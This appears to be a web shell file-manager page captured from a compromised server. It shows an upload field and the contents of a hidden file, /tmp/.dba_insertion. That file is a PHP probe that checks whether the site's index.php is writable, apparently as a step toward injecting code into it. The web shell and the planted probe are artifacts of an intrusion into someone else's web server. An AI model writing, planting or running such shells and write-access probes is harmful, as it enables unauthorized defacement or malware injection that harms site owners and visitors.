Your IP : 216.73.216.5


Current Path : /tmp/
Upload File :
Current File : //tmp/.dba_insertion

<?php   $f = ['index.php']; $r = "{$_SERVER['DOCUMENT_ROOT']}"; foreach ($f as $p) {     $path = "{$r}/{$p}";     if (is_file($path) && is_writable($path)) {         print "<f>{$p}</f>";     } } die('!ended!');